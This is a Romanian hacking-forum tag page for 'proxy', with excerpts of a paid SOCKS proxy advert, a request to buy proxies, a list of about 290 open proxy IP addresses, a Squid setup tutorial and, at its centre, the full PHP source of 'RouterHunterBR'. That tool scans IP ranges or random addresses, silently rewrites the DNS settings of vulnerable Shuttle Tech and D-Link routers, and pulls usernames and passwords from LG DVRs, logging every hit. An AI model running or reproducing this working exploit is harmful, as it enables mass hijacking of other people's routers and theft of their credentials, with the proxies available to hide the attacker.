Jump to content

Search the Community

Showing results for tags 'proxy'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. ::::::::: 5SOCKS.NET ::::::::: Professional Proxy Socks 4/5 Service. We have been operating on the market since 2004. As distinct from our short-lived competitors, we got the name of one of the best service providers due to a high quality of services, not vain promises. We have traveled a long way, which was far from being easy. But despite all challenges, we regularly streamline and improve our service quality. So, anyone can enjoy advantages of the services that we are happy to provide to our customers. - 7000+ Proxy servers online Over 7000 proxy servers online daily. A large choice of countries and US states. - Updated GEO base A regularly updated GEO base enables us to provide you with a quality search and targeting. - Double proxy check We verify our database every five minutes. We also verify proxy servers that you have chosen just before the purchase. - Friendly interface Our easy-to-use admin panel features a search by country, US state, city, hostname, IP mask, connection rate, online time and domain name. - Proxy Helper: Our software An exclusive socksifier Proxy Helper is our software for direct operations with the proxy service which makes your activities as easy and comfortable as possible. read more ... - One-hour free test account Feel free to use a free test account to get a look at your user panel and try our proxies. Please contact our support team to obtain a test account. Plans & Pricing of our proxy service Scrins of our user panel Scrinshot was made 13:00 wednesday, 18 February 2015 ?. (GMT-5) New York , USA Our web site in Russian language here : ???????? ????? ?????? ?????? ??????? ?? ??????? ?????? ???????? 5socks.net team.
  2. Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices. Readme: # RouterHunterBR TOOL - Unauthenticated Remote DNS , Scanner ranger IP. * Script exploit developed by INURL - BRAZIL * Script Name: SCANNER RouterHunterBR 1.0 * TIPE: TOOL - Unauthenticated Remote DNS * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL * AUTOR: Jhonathan davi / NICK: Jhoon * EMAIL*: inurllbr@gmail.com * Blog*: http://blog.inurl.com.br * Twitter*: https://twitter.com/googleinurl * Fanpage*: https://fb.com/InurlBrasil * GIT*: https://github.com/googleinurl * PASTEBIN*: http://pastebin.com/u/googleinurl * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/ - Description: ------ The script explores three vulnerabilities in routers * 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/ * 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/ * 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/ - Execute: ------ ``` Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' ``` - Dependencies: ------ ``` sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033 ``` - EDITING TO ADD NEW EXPLOITS GETS: ------ ``` TO DEFINE MORE EXPLOITS GET: EX: $params['exploit_model']['model_name'] = 'file_exploit.php'; $params['exploit_model']['model_001'] = '/file001CGI.cgi'; $params['exploit_model']['model_002'] = '/file001php.php'; $params['exploit_model']['model_003'] = '/file001.html'; #DEFINITION OF EXPLOITS line 92: $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1"; line 93: $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}"; line 94: $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi"; ``` Download: <?php/* * Script exploit developed by INURL - BRAZIL * Script Name: SCANNER RouterHunterBR 1.0 * TIPE: TOOL - Unauthenticated Remote DNS change/ users & passwords * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL * AUTOR: Jhonathan davi / NICK: Jhoon * EMAIL*: inurllbr@gmail.com * Blog*: http://blog.inurl.com.br * Twitter*: https://twitter.com/googleinurl * Fanpage*: https://fb.com/InurlBrasil * GIT*: https://github.com/googleinurl * PASTEBIN*: http://pastebin.com/u/googleinurl * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/'>http://packetstormsecurity.com/user/googleinurl/ ---------------------------------------------------------- * Description:* The script explores two vulnerabilities in routers 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/ 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/ 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/ ---------------------------------------------------------- * Execute* Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' ---------------------------------------------------------- * Dependencies* sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033 ---------------------------------------------------------- *Update* https://github.com/googleinurl/RouterHunterBR ---------------------------------------------------------- */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); (!isset($_SESSION) ? session_start() : NULL); $_SESSION["cont_ip"] = 0; //SETANDO CORES TERMINAL $_SESSION["c00"] = "\033[0m"; // COLOR END $_SESSION["c01"] = "\033[1;37m"; // WHITE $_SESSION["c02"] = "\033[1;33m"; // YELLOW $_SESSION["c13"] = "\033[02;31m"; // DARK RED $_SESSION["c05"] = "\033[1;32m"; // GREEN LIGHT $_SESSION["c07"] = "\033[1;30m"; // DARK GREY $command = getopt('h::', array('dns1:', 'dns2:', 'file:', 'proxy:', 'output:', 'limit-ip:', 'range:', 'rand::', 'help::', 'ajuda::')); //VERIFYING LIB php5-curl IS INSTALLED. (!function_exists('curl_exec') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install{$_SESSION["c00"]}\n")) : NULL ); (!defined('STDIN') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}Please run it through command-line!{$_SESSION["c00"]}\n")) : NULL); empty($command) ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}DEFINE THE USE OF ARGUMENTS{$_SESSION["c00"]}\n")) : NULL; (isset($opcoes['h']) || isset($command['help']) || isset($command['ajuda']) ? __banner(NULL) : NULL); #=============================================================================== ########################## CONFIGURATION SCRITPT ############################### #=============================================================================== $params['dns1'] = not_isnull_empty($command['dns1']) ? $command['dns1'] : NULL; $params['dns2'] = not_isnull_empty($command['dns2']) ? $command['dns2'] : NULL; /* TO DEFINE MORE EXPLOITS GET: EX: $params['exploit_model']['model_name'] = 'file_exploit.php'; $params['exploit_model']['model_001'] = '/file001CGI.cgi'; $params['exploit_model']['model_002'] = '/file001php.php'; $params['exploit_model']['model_003'] = '/file001.html'; */ #DEFINITION OF EXPLOITS $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1"; $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}"; $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi"; !not_isnull_empty($params['dns2']) && !not_isnull_empty($params['dns2']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE DNS1 and DNS2 ex: --dns1 '0.0.0.0.0' --dns2 '0.0.0.0.0'{$_SESSION["c00"]}\n") : NULL; $params['file_output'] = not_isnull_empty($command['output']) ? $command['output'] : __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE FILE SAVE OUTPUT ex: --output saves.txt{$_SESSION["c00"]}\n"); $params['file'] = not_isnull_empty($command['file']) ? __getIPFile($command['file']) : NULL; $params['rand'] = isset($command['rand']) ? TRUE : NULL; $params['limit-ip'] = not_isnull_empty($command['limit-ip']) ? $command['limit-ip'] : NULL; $params['proxy'] = not_isnull_empty($command['proxy']) ? $command['proxy'] : NULL; $params['range'] = not_isnull_empty($command['range']) ? __getRange($command['range']) : NULL; $params['op'] = NULL; $params['op'] = not_isnull_empty($params['range']) && !($params['rand']) && !not_isnull_empty($params['file']) ? 0 : $params['op']; $params['op'] = ($params['rand']) && !not_isnull_empty($params['range']) && !not_isnull_empty($params['file']) ? 1 : $params['op']; $params['op'] = not_isnull_empty($params['file']) && !($params['rand']) && !not_isnull_empty($params['range']) ? 2 : $params['op']; $params['line'] = "-------------------------------------------------------------\n"; #=============================================================================== function __plus() { ob_flush(); flush(); } //FILTRE USER PASS LG_DVR_LE6016D function __getUserPass($html) { $set = array(); $set['reg1'] = '/<name>(.*?)<\/name>/i'; $set['reg2'] = '/<pw>(.*?)<\/pw>/i'; if (not_isnull_empty($html) && preg_match($set['reg1'], $html) && preg_match($set['reg2'], $html)) { preg_match_all($set['reg1'], $html, $set['user']); preg_match_all($set['reg2'], $html, $set['pass']); for ($i = 0; $i <= count($set['user']); $i++) { $set['out'].= "USER: {$set['user'][1][$i]} | PW: {$set['pass'][1][$i]}\n"; } return $set['out']; } return FALSE; } //INFORMATION IP function __infoIP($ip) { __plus(); $return = json_decode(file_get_contents("http://www.telize.com/geoip/{$ip}"), TRUE); return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}"; } //VALIDATION VARIABLE function not_isnull_empty($value = NULL) { RETURN !is_null($value) && !empty($value) ? TRUE : FALSE; } //MENU BANNER function __banner($msg, $op = NULL) { system("command clear"); print_r(" \n{$_SESSION["c01"]} _____ {$_SESSION["c01"]} (_____) {$_SESSION["c01"]} ({$_SESSION["c13"]}() (){$_SESSION["c01"]}) {$_SESSION["c01"]} \ / {$_SESSION["c01"]} \ / {$_SESSION["c01"]} /=\ {$_SESSION["c01"]} [___] / script exploit developed by INURL - BRAZIL - [ SCANNER RouterHunterBR 1.0 ] {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Cleiton Pinheiro / NICK: GoogleINURL {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Jhonathan davi / NICK: Jhoon {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}EMAIL: inurllbr@gmail.com {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Blog: http://blog.inurl.com.br {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Twitter: https://twitter.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Fanpage: https://fb.com/InurlBrasil {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}GIT: https://github.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PASTEBIN: http://pastebin.com/u/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' \n{$_SESSION["c01"]}{$msg}{$_SESSION["c00"]}\n"); (is_null($op)) ? exit() : NULL; } //CREATING FORMATTING IPS FOR BAND function __getRange($range) { $ip = explode('.', $range); if (is_array($ip) && count($ip) == 4) { $ip[0] = (strstr($ip[0], '-')) ? explode('-', $ip[0]) : explode('-', "{$ip[0]}-{$ip[0]}"); $ip[1] = (strstr($ip[1], '-')) ? explode('-', $ip[1]) : explode('-', "{$ip[1]}-{$ip[1]}"); $ip[2] = (strstr($ip[2], '-')) ? explode('-', $ip[2]) : explode('-', "{$ip[2]}-{$ip[2]}"); $ip[3] = (strstr($ip[3], '-')) ? explode('-', $ip[3]) : explode('-', "{$ip[3]}-{$ip[3]}"); return $ip; } else { return FALSE; } } //GENERATING IPS RANDOM function __getIPRandom() { $bloc1 = rand(0, 255); $bloc2 = rand(0, 255); $bloc3 = rand(0, 255); $bloc4 = rand(0, 255); $ip = "{$bloc1}.{$bloc2}.{$bloc3}.{$bloc4}"; return $ip; } //OPENING FILE FILE IPS function __getIPFile($file) { if (isset($file) && !empty($file)) { $resultIP = array_unique(array_filter(explode("\n", file_get_contents($file)))); __plus(); if (is_array($resultIP)) { return ($resultIP); } } return FALSE; } //AGENT REQUEST RANDOM function __getUserAgentRandom() { //AGENT BROSER $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox', 'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror' ); //AGENT OPERATING SYSTEM $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD', 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix', 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android' ); //AGENT LOCAL FAKE $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO', 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar', 'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK' ); return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ''; } //SEND REQUEST SERVER function __request($params) { $objcurl = curl_init(); $status = array(); curl_setopt($objcurl, CURLOPT_URL, "http://{$params['host']}{$params['exploit']}"); (!is_null($params['proxy']) ? curl_setopt($objcurl, CURLOPT_PROXY, $params['proxy']) : NULL); curl_setopt($objcurl, CURLOPT_USERAGENT, __getUserAgentRandom()); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl); __plus(); $server = curl_getinfo($objcurl); __plus(); //FILTERING SERVER INFORMATION preg_match_all('(HTTP.*)', $info['corpo'], $status['http']); preg_match_all('(Server:.*)', $info['corpo'], $status['server']); preg_match_all('(X-Powered-By:.*)', $info['corpo'], $status['X-Powered-By']); $info['dados_01'] = $server; $info['dados_02'] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}")); curl_close($objcurl); __plus(); return $info; } //SUB PROCESS function __subProcess($params, $target) { foreach ($params['exploit_model'] as $camp => $value) { $params['exploit'] = $value; $params['exploit_model'] = $camp; $params['host'] = $target; $rest = __request($params); __plus(); if ($rest['dados_01']['http_code'] != 0) { break; } } __plus(); $_SESSION["cont_ip"] ++; if ($rest['dados_01']['http_code'] == 200) { //FOUND FILE $style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c05"]}"; echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; $output_view = "{$style_var} [ ! ]__[iNFO][COD]: {$rest['dados_01']['http_code']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][iP/FILE]: {$params['host']}{$params['exploit']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][MODEL]: {$params['exploit_model']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_1]: {$rest['dados_02']}\n{$_SESSION["c00"]}"; $info_ip = __infoIP($rest['dados_01']['primary_ip']); $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_2]: {$info_ip}\n{$_SESSION["c00"]}"; echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"]; $output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}"; file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND); __plus(); } else { //FILE NOT FOUND echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}"; } echo $_SESSION["c07"] . $params['line'] . $_SESSION["c00"]; } function main($params) { //IMPLEMENTATION HOME echo __banner("{$_SESSION["c13"]}{$params['line']}\n{$_SESSION["c00"]}", 1); if ($params['op'] == 0) { //WORKING WITH IPS ON TRACK for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) { __plus(); __subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}"); __plus(); } } elseif ($params['op'] == 1) { //WORKING WITH IP RANDOM !not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL; for ($i = 0; $i <= $params['limit-ip']; $i++) { __subProcess($params, __getIPRandom()); __plus(); } } elseif ($params['op'] == 2) { //IP WORK SOURCE FILE !is_array($params['file']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL; __plus(); foreach ($params['file'] as $value) { __subProcess($params, $value); __plus(); } } } //RUNNING ALL PROCESS main($params); Mirror Source
  3. 3mPtY

    Cumpar proxy

    Cumpar adrese proxy cat mai multe. Astept oferte in PM.
  4. ebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with web application planning and exploitation. Suite currently contains a spectrum of efficient, fast and stable web tools (Crawler, Bruteforcer, Fuzzer, Proxy, Editor) and some extra functionality tools (Scripting Filters, List Generator, External Proxy). Download: Sunrise Technologies
  5. Era lista mai mare,dar cum folosisem la un nou test au ramas doar:292 de proxy 95.168.217.24:3128 94.125.166.111:80 91.75.144.85:80 91.121.30.124:3128 86.122.124.11:80 78.153.149.81:3128 78.153.148.200:3128 64.62.233.67:80 62.244.31.16:7808 61.54.221.200:3128 61.234.123.64:8080 61.191.37.207:80 61.19.114.180:8080 61.156.35.2:3128 61.153.209.18:3128 60.210.18.11:80 58.68.246.12:18080 58.68.129.68:8888 58.67.193.66:8888 58.64.178.109:3128 58.254.132.87:80 58.215.142.208:80 54.188.223.55:60884 46.252.36.155:8080 41.231.53.43:3128 37.239.46.50:80 37.239.46.26:80 37.239.46.2:80 37.239.46.18:80 37.239.46.10:80 37.236.167.250:80 36.74.242.249:3128 23.236.48.43:8080 222.83.14.142:3128 222.74.28.14:23 222.29.86.170:3128 221.131.105.150:8090 221.10.102.199:80 220.227.71.47:80 220.132.139.154:3128 218.75.155.242:8888 218.244.148.34:3128 218.240.131.12:80 216.56.22.146:8080 216.145.109.98:1080 213.167.53.138:3128 212.52.161.218:8080 211.77.5.41:80 211.77.5.41:3128 211.152.50.70:80 211.151.76.25:80 211.151.13.22:81 211.144.81.67:18000 211.143.134.82:8080 211.139.80.180:8080 211.138.121.37:83 210.57.208.14:80 210.14.138.102:8080 209.97.203.64:8080 209.97.203.60:8080 208.180.88.56:8080 203.195.148.215:8080 203.172.208.43:3129 203.151.21.184:3128 202.96.172.234:808 202.56.203.150:80 202.203.17.82:3128 202.143.148.58:8080 202.114.6.37:9001 202.106.16.36:3128 201.64.231.131:3128 201.62.64.120:3128 200.82.153.18:3128 200.29.13.42:80 20.132.160.149:80 199.203.111.44:3128 199.200.120.37:7808 193.36.34.11:3128 193.204.145.80:3128 190.218.144.77:3128 190.207.35.26:3128 190.12.86.211:3128 188.241.141.112:3127 186.24.34.179:3128 183.87.210.172:3128 183.63.149.110:3128 183.224.1.99:8080 183.224.1.56:80 183.224.1.55:80 183.224.1.116:80 183.224.1.114:80 183.224.1.113:80 183.223.79.164:8123 183.223.29.62:8123 183.207.224.21:82 183.207.224.19:85 183.207.224.19:83 182.254.129.123:80 180.153.32.93:8088 179.218.149.3:3128 177.99.164.171:8080 177.67.146.232:8080 174.34.166.10:3128 173.201.183.172:8000 162.216.155.136:3127 153.120.25.103:80 149.255.255.250:80 149.255.255.242:80 140.207.223.101:80 133.242.56.68:81 125.212.209.61:8081 125.210.185.173:3128 124.238.238.50:80 124.193.25.251:8080 122.227.8.190:80 122.141.243.131:80 121.52.159.236:8080 121.199.59.43:80 121.196.141.249:80 119.97.164.48:8085 119.46.110.17:80 119.4.115.51:8090 119.188.2.54:8081 118.98.170.26:8080 118.97.66.4:8080 118.26.224.160:80 117.59.217.243:80 117.59.217.236:843 117.59.217.236:83 117.59.217.236:81 117.59.217.228:843 117.59.217.228:83 117.59.217.228:82 117.25.129.238:8888 117.135.194.140:83 116.228.80.186:8080 115.29.28.137:8090 115.29.164.173:80 115.28.15.118:82 115.238.250.23:2222 115.238.250.23:1111 114.215.179.96:80 114.112.91.116:90 114.112.91.115:90 113.57.252.104:80 112.25.9.101:80 112.213.109.244:80 112.133.255.33:80 112.124.6.101:80 111.206.125.74:8080 111.205.122.222:80 111.161.126.88:8080 111.11.228.9:81 111.11.228.10:81 111.11.228.10:80 107.182.16.221:8089 107.0.69.189:3128 106.37.177.251:3128 106.3.40.249:8081 101.55.125.73:3128 89.46.101.122:8089 89.148.232.109:3128 82.222.247.84:8080 80.254.3.58:3128 80.249.85.22:3128 80.167.238.77:1080 61.135.153.22:80 60.207.124.150:8080 60.206.55.58:8080 54.254.198.182:443 46.238.120.2:80 37.228.68.146:80 31.22.104.148:83 31.13.19.206:8080 222.74.6.10:8000 221.180.147.30:81 218.84.213.182:63000 218.76.216.56:63000 218.204.131.250:3128 210.209.72.32:8888 208.115.242.130:80 203.172.211.70:8080 202.171.253.74:80 202.143.173.67:3128 200.89.141.2:8085 199.167.228.36:3128 198.71.51.227:80 196.29.140.130:80 195.142.122.62:3128 191.103.9.209:8080 190.208.60.180:80 190.102.28.173:80 190.102.17.180:80 187.210.64.213:80 186.42.121.149:80 185.41.216.198:80 183.91.68.244:8080 183.63.149.103:80 183.61.143.133:80 183.221.63.126:8123 183.207.224.51:83 183.136.221.6:3128 182.93.236.14:8080 162.251.238.158:7808 140.113.127.204:8088 14.136.153.143:80 136.0.16.217:8089 119.247.66.251:80 118.98.73.122:80 118.70.125.6:8080 117.79.73.166:8080 116.231.3.86:80 115.28.85.240:8088 112.45.202.100:8123 111.1.32.29:86 107.182.135.94:7808 103.247.103.136:8080 103.242.109.67:8088 186.91.63.220:8080 186.91.140.85:8080 186.91.167.186:8080 186.91.187.229:8080 77.43.143.31:3128 60.207.25.3:8080 27.111.34.134:3128 222.166.172.41:8088 212.68.51.58:80 210.101.131.232:8080 202.62.9.118:3128 202.171.253.84:80 202.171.253.135:80 202.109.163.75:8085 201.211.254.222:8080 195.49.151.78:3128 190.203.48.204:8080 187.6.50.250:3128 186.24.13.125:8080 183.207.224.19:80 183.207.224.18:85 124.114.141.118:63000 121.240.238.164:80 117.218.50.134:6588 117.135.194.53:80 117.135.194.52:80 115.29.246.204:80 113.255.87.148:8088 112.105.55.128:8088 103.9.22.96:80 74.115.0.204:80 118.98.35.251:8080 91.73.160.64:80 88.159.140.239:80 66.186.2.163:80 61.7.149.69:8080 54.225.205.175:8080 221.181.104.11:8080 221.181.104.10:8080 203.81.249.19:8080 202.117.120.24:80 201.248.118.102:8080 201.211.250.202:8080 201.208.110.238:8080 190.78.7.236:8080 190.78.3.29:8080 190.77.3.145:8080 190.77.11.190:8080 190.73.7.44:8080 190.73.157.73:8080 190.38.166.143:8080 190.36.239.222:8080 190.206.66.75:8080 190.206.55.29:8080 190.205.24.89:8080 190.204.113.155:8080 190.203.80.92:8080 190.202.196.62:8080 190.201.35.101:8080 190.200.155.60:8080 190.198.175.53:8080 190.198.156.28:8080 186.95.89.86:8080 186.95.184.177:8080 201.242.60.221:8080 190.203.223.236:8080 133.242.53.172:8080 140.206.86.68:8080 170.210.136.31:80 178.18.25.85:3128 179.185.80.153:3128 182.118.23.7:8081 182.254.138.223:8088 183.207.224.21:80
  6. This tutorial is to show you how to install a proxy on Debian 7 using SQUID3 In order for this to work correctly you will need to follow these instructions. First you need to download the script, this can be done by running: wget http://rmlh.me/dw/squid.sh Login as root to the server that you will install SQUID on and with our favourite text editor and some copy/paste technique we will create the executable script. nano squid.sh Paste the text in the code section above and save the file. Make it executable with this command chmod +x ./squid-install.sh Execute the script and follow the instructions. You will actually only need to enter a username and password that will protect the proxy from anonymous use. The username and password is shown in clear-text when entering them, this is the only time they will be shown in clear-text so make sure no one is watching over your shoulder. ./squid.sh When everything is installed you will see the IP and username needed to connect to your proxy. To add another user you can run this command on the server running your Squid proxy server. htpasswd -b /etc/squid3/squid_passwd username password Change username to the username you would like to add and password to the password you would like to use. Source
